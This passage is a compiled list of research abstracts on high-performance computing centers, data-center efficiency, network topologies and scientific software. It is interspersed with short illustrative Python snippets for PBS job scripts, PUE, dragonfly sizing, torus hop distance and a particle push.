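    return "\n".join([
        "#!/bin/bash",
        f"#PBS -N proc_{scan_id}",        # job name
        f"#PBS -q {queue}",               # target queue
        f"#PBS -l walltime={walltime}",   # resource request
        f"{command} {scan_id}",           # per-scan processing step
    ])

script = make_pbs_script("scan_0001", "run_pipeline.sh")
print(script)
```

    A driver would generate one such script per unprocessed scan found in the XNAT database and hand each to the scheduler (e.g., via `qsub`), then upload results back to the corresponding XNAT session.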

  3. Energy 101: Energy Efficient Data Centers

    ScienceCinema

    None

    2018-04-16

    Data centers provide mission-critical computing functions vital to the daily operation of top U.S. economic, scientific, and technological organizations. These data centers consume large amounts of energy to run and maintain their computer systems, servers, and associated high-performance components—up to 3% of all U.S. electricity powers data centers. And as more information comes online, data centers will consume even more energy. Data centers can become more energy efficient by incorporating features like power-saving "stand-by" modes, energy monitoring software, and efficient cooling systems instead of energy-intensive air conditioners. These and other efficiency improvements to data centers can produce significant energy savings, reduce the load on the electric grid, and help protect the nation by increasing the reliability of critical computer operations.
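
    One standard way to quantify the efficiency gains described above is power usage effectiveness (PUE): total facility energy divided by the energy delivered to IT equipment, with 1.0 as the ideal. The figures below are illustrative, not measurements from any particular facility.

```python
# Power usage effectiveness (PUE), the standard data-center efficiency
# metric: total facility energy / IT equipment energy (1.0 is ideal).
# The energy figures below are illustrative assumptions.

def pue(total_facility_kwh, it_kwh):
    """Return the power usage effectiveness ratio."""
    return total_facility_kwh / it_kwh

# Delivering 1000 kWh to servers while drawing 1800 kWh overall gives
# PUE 1.8; trimming cooling overhead to 300 kWh improves it to 1.3.
print(pue(1800, 1000), pue(1300, 1000))  # → 1.8 1.3
```

    Efficiency measures like the ones listed above (efficient cooling, standby modes) show up directly as a lower numerator in this ratio.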

  4. Evolution of the Virtualized HPC Infrastructure of Novosibirsk Scientific Center

    NASA Astrophysics Data System (ADS)

    Adakin, A.; Anisenkov, A.; Belov, S.; Chubarov, D.; Kalyuzhny, V.; Kaplin, V.; Korol, A.; Kuchin, N.; Lomakin, S.; Nikultsev, V.; Skovpen, K.; Sukharev, A.; Zaytsev, A.

    2012-12-01

    Novosibirsk Scientific Center (NSC), also known worldwide as Akademgorodok, is one of the largest Russian scientific centers, hosting Novosibirsk State University (NSU) and more than 35 research organizations of the Siberian Branch of the Russian Academy of Sciences, including Budker Institute of Nuclear Physics (BINP), the Institute of Computational Technologies, and the Institute of Computational Mathematics and Mathematical Geophysics (ICM&MG). Since each institute has specific requirements on the architecture of the computing farms involved in its research field, several computing facilities are currently hosted by NSC institutes, each optimized for a particular set of tasks; the largest of these are the NSU Supercomputer Center, the Siberian Supercomputer Center (ICM&MG), and the Grid Computing Facility of BINP. A dedicated optical network with an initial bandwidth of 10 Gb/s connecting these three facilities was built in order to make it possible to share the computing resources among the research communities, thus increasing the efficiency of operating the existing computing facilities and offering a common platform for building the computing infrastructure for future scientific projects. Unification of the computing infrastructure is achieved by extensive use of virtualization technology based on the XEN and KVM platforms. This contribution gives a thorough review of the present status and future development prospects for the NSC virtualized computing infrastructure and the experience gained while using it for running production data analysis jobs related to HEP experiments being carried out at BINP, especially the KEDR detector experiment at the VEPP-4M electron-positron collider.

  5. An investigation of the effects of touchpad location within a notebook computer.

    PubMed

    Kelaher, D; Nay, T; Lawrence, B; Lamar, S; Sommerich, C M

    2001-02-01

    This study evaluated effects of the location of a notebook computer's integrated touchpad, complementing previous work in the area of desktop mouse location effects. Most often integrated touchpads are located in the computer's wrist rest, and centered on the keyboard. This study characterized effects of this bottom center location and four alternatives (top center, top right, right side, and bottom right) upon upper extremity posture, discomfort, preference, and performance. Touchpad location was found to significantly impact each of those measures. The top center location was particularly poor, in that it elicited more ulnar deviation, more shoulder flexion, more discomfort, and perceptions of performance impedance. In general, the bottom center, bottom right, and right side locations fared better, though subjects' wrists were more extended in the bottom locations. Suggestions for notebook computer design are provided.

  6. FY 72 Computer Utilization at the Transportation Systems Center

    DOT National Transportation Integrated Search

    1972-08-01

    The Transportation Systems Center currently employs a medley of on-site and off-site computer systems to obtain the computational support it requires. Examination of the monthly User Accountability Reports for FY72 indicated that during the fiscal ye...

  7. Evaluating System Parameters on a Dragonfly using Simulation and Visualization

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Bhatele, Abhinav; Jain, Nikhil; Livnat, Yarden

    The dragonfly topology is becoming a popular choice for building high-radix, low-diameter networks with high-bandwidth links. Even with a powerful network, preliminary experiments on Edison at NERSC have shown that for communication-heavy applications, job interference and thus presumably job placement remains an important factor. In this paper, we explore the effects of job placement, job sizes, parallel workloads and network configurations on network throughput to better understand inter-job interference. We use a simulation tool called Damselfly to model the network behavior of Edison and study the impact of various system parameters on network throughput. Parallel workloads based on five representative communication patterns are used, and the simulation studies on up to 131,072 cores are aided by a new visualization of the dragonfly network.
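
    For readers unfamiliar with the topology, a balanced dragonfly's size follows from three router parameters in the standard construction: p terminals per router, a routers per group, and h global links per router, giving a*h + 1 groups. The parameter values below are illustrative, not Edison's actual Aries configuration.

```python
# Back-of-envelope size of a balanced dragonfly network (standard
# construction). Parameter values here are illustrative assumptions.

def dragonfly_size(p, a, h):
    """Return (groups, routers, terminals) for a balanced dragonfly
    with p terminals/router, a routers/group, h global links/router."""
    groups = a * h + 1       # each group reaches every other group
    routers = a * groups
    terminals = p * routers
    return groups, routers, terminals

g, r, n = dragonfly_size(p=4, a=8, h=4)
print(g, r, n)  # → 33 264 1056
```

    The low diameter comes from this construction: any two terminals are separated by at most one global (inter-group) link plus a few local hops, which is also why a handful of congested global links can make one job's traffic visible to another.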

  8. Ab initio study on the dynamics of furfural at the liquid-solid interfaces

    NASA Astrophysics Data System (ADS)

    Dang, Hongli; Xue, Wenhua; Shields, Darwin; Liu, Yingdi; Jentoft, Friederike; Resasco, Daniel; Wang, Sanwu

    2013-03-01

    Catalytic biomass conversion sometimes occurs at liquid-solid interfaces. We report ab initio molecular dynamics simulations at finite temperatures for the catalytic reactions involving furfural at the water-Pd and water-Cu interfaces. We found that, during the dynamic process, the furan ring of furfural prefers to be parallel to the Pd surface and the aldehyde group tends to be away from the Pd surface. On the other hand, at the water-Cu(111) interface, furfural prefers to be tilted relative to the Cu surface while the aldehyde group is bonded to the surface. In both cases, interaction of liquid water and furfural is identified. The difference in the dynamics of furfural at the two interfaces suggests different catalytic reaction mechanisms for the conversion of furfural, consistent with the experimental investigations. Supported by DOE (DE-SC0004600). Simulations and calculations were performed on XSEDE's and NERSC's supercomputers.

  9. Decarboxylation of furfural on Pd(111): Ab initio molecular dynamics simulations

    NASA Astrophysics Data System (ADS)

    Xue, Wenhua; Dang, Hongli; Shields, Darwin; Liu, Yingdi; Jentoft, Friederike; Resasco, Daniel; Wang, Sanwu

    2013-03-01

    Furfural conversion over metal catalysts plays an important role in the studies of biomass-derived feedstocks. We report ab initio molecular dynamics simulations for the decarboxylation process of furfural on the palladium surface at finite temperatures. We observed and analyzed the atomic-scale dynamics of furfural on the Pd(111) surface and the fluctuations of the bondlengths between the atoms in furfural. We found that the dominant bonding structure is the parallel structure in which the furfural plane, while slightly distorted, is parallel to the Pd surface. Analysis of the bondlength fluctuations indicates that the C-H bond in the aldehyde group of a furfural molecule is likely to be broken first, while the C=O bond has a tendency to be isolated as CO. Our results show that the reaction of decarbonylation dominates, consistent with the experimental measurements. Supported by DOE (DE-SC0004600). Simulations and calculations were performed on XSEDE's and NERSC's supercomputers.

  10. Recent advances in the modeling of plasmas with the Particle-In-Cell methods

    NASA Astrophysics Data System (ADS)

    Vay, Jean-Luc; Lehe, Remi; Vincenti, Henri; Godfrey, Brendan; Lee, Patrick; Haber, Irv

    2015-11-01

    The Particle-In-Cell (PIC) approach is the method of choice for self-consistent simulations of plasmas from first principles. The fundamentals of the PIC method were established decades ago but improvements or variations are continuously being proposed. We report on several recent advances in PIC related algorithms, including: (a) detailed analysis of the numerical Cherenkov instability and its remediation, (b) analytic pseudo-spectral electromagnetic solvers in Cartesian and cylindrical (with azimuthal modes decomposition) geometries, (c) arbitrary-order finite-difference and generalized pseudo-spectral Maxwell solvers, (d) novel analysis of Maxwell's solvers' stencil variation and truncation, in application to domain decomposition strategies and implementation of Perfectly Matched Layers in high-order and pseudo-spectral solvers. Work supported by US-DOE Contracts DE-AC02-05CH11231 and the US-DOE SciDAC program ComPASS. Used resources of NERSC, supported by US-DOE Contract DE-AC02-05CH11231.
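
    At the core of every PIC variant surveyed above is the particle push. A minimal kick-drift sketch is shown below, with the field solve and charge/current deposition omitted and a uniform electric field in normalized units assumed; it is an illustration of the integrator's structure, not any production code's pusher.

```python
# Minimal kick-drift particle push, the building block of the
# leapfrog-style integrators used in PIC codes. Field solve and
# deposition are omitted; uniform field, normalized units (assumed).

def push(x, v, e_field, qm, dt):
    """Kick (update velocity from the field), then drift (update position)."""
    v = v + qm * e_field * dt
    x = x + v * dt
    return x, v

# A particle starting at rest in a unit field accelerates uniformly.
x, v = 0.0, 0.0
for _ in range(10):
    x, v = push(x, v, e_field=1.0, qm=1.0, dt=0.1)
print(round(x, 6), round(v, 6))  # → 0.55 1.0
```

    A full PIC cycle wraps this push with charge deposition onto the grid, a Maxwell (or Poisson) solve, and field gathering back to the particles; the advances listed above largely target the solver and its numerical artifacts rather than this push step.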

  11. Mapping to Irregular Torus Topologies and Other Techniques for Petascale Biomolecular Simulation

    PubMed Central

    Phillips, James C.; Sun, Yanhua; Jain, Nikhil; Bohm, Eric J.; Kalé, Laxmikant V.

    2014-01-01

    Currently deployed petascale supercomputers typically use toroidal network topologies in three or more dimensions. While these networks perform well for topology-agnostic codes on a few thousand nodes, leadership machines with 20,000 nodes require topology awareness to avoid network contention for communication-intensive codes. Topology adaptation is complicated by irregular node allocation shapes and holes due to dedicated input/output nodes or hardware failure. In the context of the popular molecular dynamics program NAMD, we present methods for mapping a periodic 3-D grid of fixed-size spatial decomposition domains to 3-D Cray Gemini and 5-D IBM Blue Gene/Q toroidal networks to enable hundred-million atom full machine simulations, and to similarly partition node allocations into compact domains for smaller simulations using multiple-copy algorithms. Additional enabling techniques are discussed and performance is reported for NCSA Blue Waters, ORNL Titan, ANL Mira, TACC Stampede, and NERSC Edison. PMID:25594075
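
    The mapping problem described above ultimately comes down to minimizing hop counts on a wraparound grid. A minimal sketch of that metric follows, ignoring the irregular allocation shapes and holes the paper actually handles.

```python
# The basic quantity a topology-aware mapper minimizes: hop distance
# between two nodes of a torus, where every dimension wraps around.
# Illustrative sketch only; real Gemini/Blue Gene/Q mappings also cope
# with irregular allocations and failed nodes.

def torus_hops(a, b, dims):
    """Manhattan distance with wraparound along each torus dimension."""
    return sum(min(abs(x - y), d - abs(x - y))
               for x, y, d in zip(a, b, dims))

# On an 8x8x8 torus, (0,0,0) -> (7,4,1) is 1 + 4 + 1 = 6 hops,
# because coordinate 7 is one wraparound hop from coordinate 0.
print(torus_hops((0, 0, 0), (7, 4, 1), (8, 8, 8)))  # → 6
```

    Mapping neighboring spatial-decomposition domains to nodes with small values of this metric keeps most NAMD communication on short paths and off contended long links.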

  12. Kevin Regimbal | NREL

    Science.gov Websites

    Kevin Regimbal oversees NREL's High Performance Computing (HPC) Systems & Operations group, spanning systems, engineering, and operations. Kevin is interested in data center design and computing, as well as data center integration and optimization. Professional Experience: HPC oversight as program manager, project manager, center

  13. The role of dedicated data computing centers in the age of cloud computing

    NASA Astrophysics Data System (ADS)

    Caramarcu, Costin; Hollowell, Christopher; Strecker-Kellogg, William; Wong, Antonio; Zaytsev, Alexandr

    2017-10-01

    Brookhaven National Laboratory (BNL) anticipates significant growth in scientific programs with large computing and data storage needs in the near future and has recently reorganized support for scientific computing to meet these needs. A key component is the enhanced role of the RHIC-ATLAS Computing Facility (RACF) in support of high-throughput and high-performance computing (HTC and HPC) at BNL. This presentation discusses the evolving role of the RACF at BNL, in light of its growing portfolio of responsibilities and its increasing integration with cloud (academic and for-profit) computing activities. We also discuss BNL’s plan to build a new computing center to support the new responsibilities of the RACF and present a summary of the cost benefit analysis done, including the types of computing activities that benefit most from a local data center vs. cloud computing. This analysis is partly based on an updated cost comparison of Amazon EC2 computing services and the RACF, which was originally conducted in 2012.

  14. CAROLINA CENTER FOR COMPUTATIONAL TOXICOLOGY

    EPA Science Inventory

    The Center will advance the field of computational toxicology through the development of new methods and tools, as well as through collaborative efforts. In each Project, new computer-based models will be developed and published that represent the state-of-the-art. The tools p...

  15. OpenMSI: A High-Performance Web-Based Platform for Mass Spectrometry Imaging

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Rubel, Oliver; Greiner, Annette; Cholia, Shreyas

    Mass spectrometry imaging (MSI) enables researchers to probe endogenous molecules directly within the architecture of the biological matrix. Unfortunately, efficient access, management, and analysis of the data generated by MSI approaches remain major challenges to this rapidly developing field. Despite the availability of numerous dedicated file formats and software packages, it is a widely held viewpoint that the biggest challenge is simply opening, sharing, and analyzing a file without loss of information. Here we present OpenMSI, a software framework and platform that addresses these challenges via an advanced, high-performance, extensible file format and Web API for remote data access (http://openmsi.nersc.gov). The OpenMSI file format supports storage of raw MSI data, metadata, and derived analyses in a single, self-describing format based on HDF5 and is supported by a large range of analysis software (e.g., Matlab and R) and programming languages (e.g., C++, Fortran, and Python). Careful optimization of the storage layout of MSI data sets using chunking, compression, and data replication accelerates common, selective data access operations while minimizing data storage requirements, and is a critical enabler of rapid data I/O. The OpenMSI file format has been shown to provide >2000-fold improvement for image access operations, enabling spectrum and image retrieval in less than 0.3 s across the Internet even for 50 GB MSI data sets. To make remote high-performance compute resources accessible for analysis and to facilitate data sharing and collaboration, we describe an easy-to-use yet powerful Web API, enabling fast and convenient access to MSI data, metadata, and derived analysis results stored remotely to facilitate high-performance data analysis and enable implementation of Web-based data sharing, visualization, and analysis.
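    The storage-layout idea described — chunking plus compression so that selective reads touch only the data they need — can be sketched with h5py. The dataset shape, chunk shape, and file name below are illustrative assumptions, not OpenMSI's actual format:

```python
import numpy as np
import h5py

# Hypothetical MSI cube: an (x, y) pixel grid with one spectrum per pixel.
nx, ny, nmz = 32, 32, 256
data = np.random.rand(nx, ny, nmz).astype("float32")

with h5py.File("msi_demo.h5", "w") as f:
    # Chunk so that one m/z slice is exactly one chunk: retrieving a single
    # ion image then reads one chunk instead of the whole cube. Gzip trades
    # a little CPU for much smaller storage.
    f.create_dataset("msidata", data=data,
                     chunks=(nx, ny, 1),
                     compression="gzip", compression_opts=4)

with h5py.File("msi_demo.h5", "r") as f:
    image = f["msidata"][:, :, 100]   # selective read of one ion image
```

    Chunking along spectra instead of images would make the opposite access pattern (one spectrum per pixel) the cheap one, which is why layout choices like these matter for mixed workloads.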

  16. Adaptation of a Control Center Development Environment for Industrial Process Control

    NASA Technical Reports Server (NTRS)

    Killough, Ronnie L.; Malik, James M.

    1994-01-01

    In the control center, raw telemetry data is received for storage, display, and analysis. This raw data must be combined and manipulated in various ways by mathematical computations to facilitate analysis, provide diversified fault detection mechanisms, and enhance display readability. A development tool called the Graphical Computation Builder (GCB) has been implemented which provides flight controllers with the capability to implement computations for use in the control center. The GCB provides a language that contains both general programming constructs and language elements specifically tailored for the control center environment. The GCB concept allows staff who are not skilled in computer programming to author and maintain computer programs. The GCB user is isolated from the details of external subsystem interfaces and has access to high-level functions such as matrix operators, trigonometric functions, and unit conversion macros. The GCB provides a high level of feedback during computation development that improves upon the often cryptic errors produced by computer language compilers. An equivalent need can be identified in the industrial data acquisition and process control domain: that of an integrated graphical development tool tailored to the application to hide the operating system, computer language, and data acquisition interface details. The GCB features a modular design which makes it suitable for technology transfer without significant rework. Control center-specific language elements can be replaced by elements specific to industrial process control.

  17. Cloudbursting - Solving the 3-body problem

    NASA Astrophysics Data System (ADS)

    Chang, G.; Heistand, S.; Vakhnin, A.; Huang, T.; Zimdars, P.; Hua, H.; Hood, R.; Koenig, J.; Mehrotra, P.; Little, M. M.; Law, E.

    2014-12-01

    Many science projects in the future will be accomplished through collaboration among two or more NASA centers along with, potentially, external scientists. Science teams will be composed of more geographically dispersed individuals and groups. However, the current computing environment does not make this easy and seamless. By being able to share computing resources among members of a multi-center team working on a science/engineering project, limited pre-competition funds could be more efficiently applied and technical work could be conducted more effectively with less time spent moving data or waiting for computing resources to free up. Based on work from a NASA CIO IT Labs task, this presentation will highlight our prototype work in assessing the feasibility and identifying the obstacles, both technical and managerial, of performing "Cloudbursting" among private clouds located at three different centers. We will demonstrate the use of private cloud computing infrastructure at the Jet Propulsion Laboratory, Langley Research Center, and Ames Research Center to provide elastic computation to each other to perform parallel Earth Science data imaging. We leverage elastic load balancing and auto-scaling features at each data center so that each location can independently define how many resources to allocate to a particular job that was "bursted" from another data center and demonstrate that compute capacity scales up and down with the job. We will also discuss future work in the area, which could include the use of cloud infrastructure from different cloud framework providers as well as other cloud service providers.

  18. Computers and Media Centers--A Winning Combination.

    ERIC Educational Resources Information Center

    Graf, Nancy

    1984-01-01

    Profile of the computer program offered by the library/media center at Chief Joseph Junior High School in Richland, Washington, highlights program background, operator's licensing procedure, the trainer license, assistance from high school students, need for more computers, handling of software, and helpful hints. (EJS)

  19. For operation of the Computer Software Management and Information Center (COSMIC)

    NASA Technical Reports Server (NTRS)

    Carmon, J. L.

    1983-01-01

    During the month of June, the Survey Research Center (SRC) at the University of Georgia designed new benefits questionnaires for computer software management and information center (COSMIC). As a test of their utility, these questionnaires are now used in the benefits identification process.

  20. Reinventing patient-centered computing for the twenty-first century.

    PubMed

    Goldberg, H S; Morales, A; Gottlieb, L; Meador, L; Safran, C

    2001-01-01

    Despite evidence over the past decade that patients like and will use patient-centered computing systems in managing their health, patients have remained forgotten stakeholders in advances in clinical computing systems. We present a framework for patient empowerment and the technical realization of that framework in an architecture called CareLink. In an evaluation of the initial deployment of CareLink in the support of neonatal intensive care, we have demonstrated a reduction in the length of stay for very-low birthweight infants, and an improvement in family satisfaction with care delivery. With the ubiquitous adoption of the Internet into the general culture, patient-centered computing provides the opportunity to mend broken health care relationships and reconnect patients to the care delivery process. CareLink itself provides functionality to support both clinical care and research, and provides a living laboratory for the further study of patient-centered computing.

  1. Join the Center for Applied Scientific Computing

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Gamblin, Todd; Bremer, Timo; Van Essen, Brian

    The Center for Applied Scientific Computing serves as Livermore Lab’s window to the broader computer science, computational physics, applied mathematics, and data science research communities. In collaboration with academic, industrial, and other government laboratory partners, we conduct world-class scientific research and development on problems critical to national security. CASC applies the power of high-performance computing and the efficiency of modern computational methods to the realms of stockpile stewardship, cyber and energy security, and knowledge discovery for intelligence applications.

  2. Advanced Biomedical Computing Center (ABCC) | DSITP

    Cancer.gov

    The Advanced Biomedical Computing Center (ABCC), located in Frederick Maryland (MD), provides HPC resources for both NIH/NCI intramural scientists and the extramural biomedical research community. Its mission is to provide HPC support, to provide collaborative research, and to conduct in-house research in various areas of computational biology and biomedical research.

  3. New developments in delivering public access to data from the National Center for Computational Toxicology at the EPA

    EPA Science Inventory

    Researchers at EPA’s National Center for Computational Toxicology integrate advances in biology, chemistry, and computer science to examine the toxicity of chemicals and help prioritize chemicals for further research based on potential human health risks. The goal of this researc...

  4. Community Information Centers and the Computer.

    ERIC Educational Resources Information Center

    Carroll, John M.; Tague, Jean M.

    Two computer data bases have been developed by the Computer Science Department at the University of Western Ontario for "Information London," the local community information center. One system, called LONDON, permits Boolean searches of a file of 5,000 records describing human service agencies in the London area. The second system,…

  5. 78 FR 69926 - Privacy Act of 1974, as Amended; Computer Matching Program (SSA/Centers for Medicare & Medicaid...

    Federal Register 2010, 2011, 2012, 2013, 2014

    2013-11-21

    ... SOCIAL SECURITY ADMINISTRATION [Docket No. SSA 2013-0059] Privacy Act of 1974, as Amended; Computer Matching Program (SSA/ Centers for Medicare & Medicaid Services (CMS))--Match Number 1076 AGENCY: Social Security Administration (SSA). ACTION: Notice of a renewal of an existing computer matching...

  6. 76 FR 21091 - Privacy Act of 1974, as Amended; Computer Matching Program (SSA/Centers for Medicare & Medicaid...

    Federal Register 2010, 2011, 2012, 2013, 2014

    2011-04-14

    ... SOCIAL SECURITY ADMINISTRATION [Docket No. SSA 2011-0022] Privacy Act of 1974, as Amended; Computer Matching Program (SSA/ Centers for Medicare & Medicaid Services (CMS))--Match Number 1076 AGENCY: Social Security Administration (SSA). ACTION: Notice of a renewal of an existing computer matching...

  7. Cornell University Center for Advanced Computing

    Science.gov Websites


  8. Digital optical computers at the optoelectronic computing systems center

    NASA Technical Reports Server (NTRS)

    Jordan, Harry F.

    1991-01-01

    The Digital Optical Computing Program within the National Science Foundation Engineering Research Center for Opto-electronic Computing Systems has as its specific goal research on optical computing architectures suitable for use at the highest possible speeds. The program can be targeted toward exploiting the time domain because other programs in the Center are pursuing research on parallel optical systems, exploiting optical interconnection and optical devices and materials. Using a general purpose computing architecture as the focus, we are developing design techniques, tools and architecture for operation at the speed of light limit. Experimental work is being done with the somewhat low speed components currently available but with architectures which will scale up in speed as faster devices are developed. The design algorithms and tools developed for a general purpose, stored program computer are being applied to other systems such as optimally controlled optical communication networks.

  9. Final Report. Center for Scalable Application Development Software

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Mellor-Crummey, John

    2014-10-26

    The Center for Scalable Application Development Software (CScADS) was established as a partnership between Rice University, Argonne National Laboratory, University of California Berkeley, University of Tennessee – Knoxville, and University of Wisconsin – Madison. CScADS pursued an integrated set of activities with the aim of increasing the productivity of DOE computational scientists by catalyzing the development of systems software, libraries, compilers, and tools for leadership computing platforms. Principal Center activities were workshops to engage the research community in the challenges of leadership computing, research and development of open-source software, and work with computational scientists to help them develop codes for leadership computing platforms. This final report summarizes CScADS activities at Rice University in these areas.

  10. Intention and Usage of Computer Based Information Systems in Primary Health Centers

    ERIC Educational Resources Information Center

    Hosizah; Kuntoro; Basuki N., Hari

    2016-01-01

    Computer-based information systems (CBIS) have been adopted in almost all health care settings, including primary health centers in East Java Province, Indonesia. Among the software packages available were SIMPUS, SIMPUSTRONIK, SIKDA Generik, and e-puskesmas. Unfortunately, most primary health centers did not implement them successfully. This…

  11. Using Frameworks in a Government Contracting Environment: Case Study at the NASA Center for Computational Sciences

    NASA Technical Reports Server (NTRS)

    McGalliard, James

    2008-01-01

    A viewgraph describing the use of multiple frameworks by NASA, GSA, and U.S. Government agencies is presented. The contents include: 1) Federal Systems Integration and Management Center (FEDSIM) and NASA Center for Computational Sciences (NCCS) Environment; 2) Ruling Frameworks; 3) Implications; and 4) Reconciling Multiple Frameworks.

  12. Roy Fraley | NREL

    Science.gov Websites

    Roy Fraley, Professional II-Engineer, Roy.Fraley@nrel.gov | 303-384-6468. Roy Fraley is the high-performance computing (HPC) data center engineer with the Computational Science Center's HPC

  13. JobCenter: an open source, cross-platform, and distributed job queue management system optimized for scalability and versatility.

    PubMed

    Jaschob, Daniel; Riffle, Michael

    2012-07-30

    Laboratories engaged in computational biology or bioinformatics frequently need to run lengthy, multistep, and user-driven computational jobs. Each job can tie up a computer for a few minutes to several days, and many laboratories lack the expertise or resources to build and maintain a dedicated computer cluster. JobCenter is a client-server application and framework for job management and distributed job execution. The client and server components are both written in Java and are cross-platform and relatively easy to install. All communication with the server is client-driven, which allows worker nodes to run anywhere (even behind external firewalls or "in the cloud") and provides inherent load balancing. Adding a worker node to the worker pool is as simple as dropping the JobCenter client files onto any computer and performing basic configuration, which provides tremendous ease-of-use, flexibility, and limitless horizontal scalability. Each worker installation may be independently configured, including the types of jobs it is able to run. Executed jobs may be written in any language and may include multistep workflows. JobCenter is a versatile and scalable distributed job management system that allows laboratories to very efficiently distribute all computational work among available resources. JobCenter is freely available at http://code.google.com/p/jobcenter/.
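    The client-driven pull model that the abstract credits for firewall-friendliness and inherent load balancing can be sketched in miniature. This is an in-process toy, not JobCenter's Java client/server; all class and function names here are hypothetical:

```python
import queue
import threading

class JobServer:
    """Toy stand-in for a job server: holds pending jobs, and all
    interaction is client-driven (workers pull work, then report back)."""
    def __init__(self):
        self.pending = queue.Queue()
        self.results = {}

    def submit(self, job_id, payload):
        self.pending.put((job_id, payload))

    def request_work(self):
        """Called by a worker; returns a job, or None if none are pending."""
        try:
            return self.pending.get_nowait()
        except queue.Empty:
            return None

    def report(self, job_id, result):
        self.results[job_id] = result

def worker_loop(server):
    """Each worker pulls jobs until the queue drains. Because workers
    initiate every exchange, they can sit behind firewalls, and faster
    workers naturally pull more jobs (load balancing for free)."""
    while (job := server.request_work()) is not None:
        job_id, payload = job
        server.report(job_id, payload ** 2)   # stand-in computation

server = JobServer()
for i in range(10):
    server.submit(i, i)
workers = [threading.Thread(target=worker_loop, args=(server,)) for _ in range(3)]
for t in workers:
    t.start()
for t in workers:
    t.join()
```

    The real system replaces the in-process queue with network calls, but the control flow — pull, compute, report — is the same.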

  14. Computers in Schools of Southeast Texas in 1997.

    ERIC Educational Resources Information Center

    Henderson, David L.; Renfrow, Raylene

    This study examined computer use in southeast Texas schools in 1997. The study population included 110 school districts in Education Service Center Regions IV and VI. These centers serve 22 counties of southeast Texas in the Houston area. Using questionnaires, researchers collected data on brands of computers presently in use, percent of computer…

  15. 77 FR 33547 - Privacy Act of 1974, as Amended; Computer Matching Program (SSA/Centers for Medicare and Medicaid...

    Federal Register 2010, 2011, 2012, 2013, 2014

    2012-06-06

    ... SOCIAL SECURITY ADMINISTRATION [Docket No. SSA 2012-0015] Privacy Act of 1974, as Amended; Computer Matching Program (SSA/ Centers for Medicare and Medicaid Services (CMS))--Match Number 1094 AGENCY: Social Security Administration (SSA). ACTION: Notice of a new computer matching program that will expire...

  16. The National Special Education Alliance: One Year Later.

    ERIC Educational Resources Information Center

    Green, Peter

    1988-01-01

    The National Special Education Alliance (a national network of local computer resource centers associated with Apple Computer, Inc.) consists, one year after formation, of 24 non-profit support centers staffed largely by volunteers. The NSEA now reaches more than 1000 disabled computer users each month and more growth in the future is expected.…

  17. The Benefits of Making Data from the EPA National Center for Computational Toxicology available for reuse (ACS Fall meeting 3 of 12)

    EPA Science Inventory

    Researchers at EPA’s National Center for Computational Toxicology (NCCT) integrate advances in biology, chemistry, exposure and computer science to help prioritize chemicals for further research based on potential human health risks. The goal of this research is to quickly evalua...

  18. Books, Bytes, and Bridges: Libraries and Computer Centers in Academic Institutions.

    ERIC Educational Resources Information Center

    Hardesty, Larry, Ed.

    This book about the relationship between computer centers and libraries at academic institutions contains the following chapters: (1) "A History of the Rhetoric and Reality of Library and Computing Relationships" (Peggy Seiden and Michael D. Kathman); (2) "An Issue in Search of a Metaphor: Readings on the Marriageability of…

  19. Computational structures technology and UVA Center for CST

    NASA Technical Reports Server (NTRS)

    Noor, Ahmed K.

    1992-01-01

    Rapid advances in computer hardware have had a profound effect on various engineering and mechanics disciplines, including the materials, structures, and dynamics disciplines. A new technology, computational structures technology (CST), has recently emerged as an insightful blend between material modeling, structural and dynamic analysis and synthesis on the one hand, and other disciplines such as computer science, numerical analysis, and approximation theory, on the other hand. CST is an outgrowth of finite element methods developed over the last three decades. The focus of this presentation is on some aspects of CST which can impact future airframes and propulsion systems, as well as on the newly established University of Virginia (UVA) Center for CST. The background and goals for CST are described along with the motivations for developing CST, and a brief discussion is made on computational material modeling. We look at the future in terms of technical needs, computing environment, and research directions. The newly established UVA Center for CST is described. One of the research projects of the Center is described, and a brief summary of the presentation is given.

  20. Computer programs: Operational and mathematical, a compilation

    NASA Technical Reports Server (NTRS)

    1973-01-01

    Several computer programs which are available through the NASA Technology Utilization Program are outlined. Presented are: (1) Computer operational programs which can be applied to resolve procedural problems swiftly and accurately. (2) Mathematical applications for the resolution of problems encountered in numerous industries. Although the functions which these programs perform are not new and similar programs are available in many large computer center libraries, this collection may be of use to centers with limited systems libraries and for instructional purposes for new computer operators.

  1. For operation of the Computer Software Management and Information Center (COSMIC)

    NASA Technical Reports Server (NTRS)

    Carmon, J. L.

    1983-01-01

    Progress report on current status of computer software management and information center (COSMIC) includes the following areas: inventory, evaluation and publication, marketing, customer service, maintenance and support, and budget summary.

  2. Center for Advanced Computational Technology

    NASA Technical Reports Server (NTRS)

    Noor, Ahmed K.

    2000-01-01

    The Center for Advanced Computational Technology (ACT) was established to serve as a focal point for diverse research activities pertaining to application of advanced computational technology to future aerospace systems. These activities include the use of numerical simulations, artificial intelligence methods, multimedia and synthetic environments, and computational intelligence, in the modeling, analysis, sensitivity studies, optimization, design and operation of future aerospace systems. The Center is located at NASA Langley and is an integral part of the School of Engineering and Applied Science of the University of Virginia. The Center has four specific objectives: 1) conduct innovative research on applications of advanced computational technology to aerospace systems; 2) act as pathfinder by demonstrating to the research community what can be done (high-potential, high-risk research); 3) help in identifying future directions of research in support of the aeronautical and space missions of the twenty-first century; and 4) help in the rapid transfer of research results to industry and in broadening awareness among researchers and engineers of the state-of-the-art in applications of advanced computational technology to the analysis, design prototyping and operations of aerospace and other high-performance engineering systems. In addition to research, Center activities include helping in the planning and coordination of the activities of a multi-center team of NASA and JPL researchers who are developing an intelligent synthesis environment for future aerospace systems; organizing workshops and national symposia; as well as writing state-of-the-art monographs and NASA special publications on timely topics.

  3. CNC Turning Center Advanced Operations. Computer Numerical Control Operator/Programmer. 444-332.

    ERIC Educational Resources Information Center

    Skowronski, Steven D.; Tatum, Kenneth

    This student guide provides materials for a course designed to introduce the student to the operations and functions of a two-axis computer numerical control (CNC) turning center. The course consists of seven units. Unit 1 presents course expectations and syllabus, covers safety precautions, and describes the CNC turning center components, CNC…

  4. Information and psychomotor skills knowledge acquisition: A student-customer-centered and computer-supported approach.

    PubMed

    Nicholson, Anita; Tobin, Mary

    2006-01-01

    This presentation will discuss coupling commercial and customized computer-supported teaching aids to provide BSN nursing students with a friendly customer-centered self-study approach to psychomotor skill acquisition.

  5. Computational mechanics and physics at NASA Langley Research Center

    NASA Technical Reports Server (NTRS)

    South, Jerry C., Jr.

    1987-01-01

